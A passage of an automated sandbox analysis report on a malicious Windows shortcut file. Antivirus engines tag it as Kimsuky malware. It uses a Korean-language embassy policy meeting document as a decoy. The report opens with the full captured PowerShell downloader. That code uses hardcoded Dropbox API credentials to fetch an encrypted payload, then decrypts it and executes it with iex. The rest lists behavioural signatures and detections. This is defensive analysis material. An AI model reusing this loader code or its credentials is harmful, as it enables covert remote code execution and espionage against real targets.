System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 21, 2024, 2:23 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (2 events)

Data sent	yufÅyîÈÅíÄÎjù·%SøQÉRG×d À/5 ÀÀÀ À 284ÿcontent.dropboxapi.com
Data sent	yufÅyîËNk6zOÂ}Æ²Ò¿®s¸F!}3@kÚ/5 ÀÀÀ À 284ÿcontent.dropboxapi.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 21, 2024, 2:23 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Aug. 21, 2024, 2:23 p.m.	buffer: yufÅyîÈÅíÄÎjù·%SøQÉRG×d À/5 ÀÀÀ À 284ÿcontent.dropboxapi.com socket: 1476 sent: 126	1	126	0
send Aug. 21, 2024, 2:23 p.m.	buffer: yufÅyîËNk6zOÂ}Æ²Ò¿®s¸F!}3@kÚ/5 ÀÀÀ À 284ÿcontent.dropboxapi.com socket: 1476 sent: 126	1	126	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp
parent_process	powershell.exe				martian_process	"C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 resumed a thread in remote process 2660
NtResumeThread Aug. 21, 2024, 2:23 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2660	1	0	0

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Lionic	Trojan.WinLNK.Boxter.4!c
CAT-QuickHeal	Lnk.trojan.A12022571
Skyhigh	BehavesLike.Dropper.tx
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Heur.BZC.YAX.Boxter.331.8F498F23
Arcabit	Heur.BZC.YAX.Boxter.331.8F498F23
Symantec	Scr.Mallnk!gen13
ESET-NOD32	LNK/Kimsuky.H
TrendMicro-HouseCall	TROJ_FRS.0NA103D424
McAfee	LNK/Agent.aj
Avast	LNK:Agent-IL [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecod.i
BitDefender	Heur.BZC.YAX.Boxter.331.8F498F23
MicroWorld-eScan	Heur.BZC.YAX.Boxter.331.8F498F23
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft	Trojan.PowerShell.Gen (A)
DrWeb	Trojan.MulDrop26.46164
TrendMicro	TROJ_FRS.0NA103D424
FireEye	Heur.BZC.YAX.Boxter.331.8F498F23
Sophos	Troj/LnkObf-T
Ikarus	Trojan.SuspectCRC
Google	Detected
MAX	malware (ai score=83)
Kingsoft	Script.Troj.CMDLnk.22143
Microsoft	Trojan:Win32/Casdet!rfn
ViRobot	LNK.S.PowerShell.1110652
ZoneAlarm	HEUR:Trojan.Multi.Powecod.i
GData	Heur.BZC.YAX.Boxter.331.8F498F23
Varist	LNK/ABTrojan.AGHM-1
AhnLab-V3	Downloader/LNK.Powershell.S2543
VBA32	Trojan.Link.Crafted
Tencent	Win32.Trojan.Powecod.Bgow
huorong	TrojanDownloader/LNK.Agent.co
Fortinet	LNK/Kimsuky.GOSU!tr
AVG	LNK:Agent-IL [Trj]
alibabacloud	Trojan:Win/Kimsuky.H

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe

202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All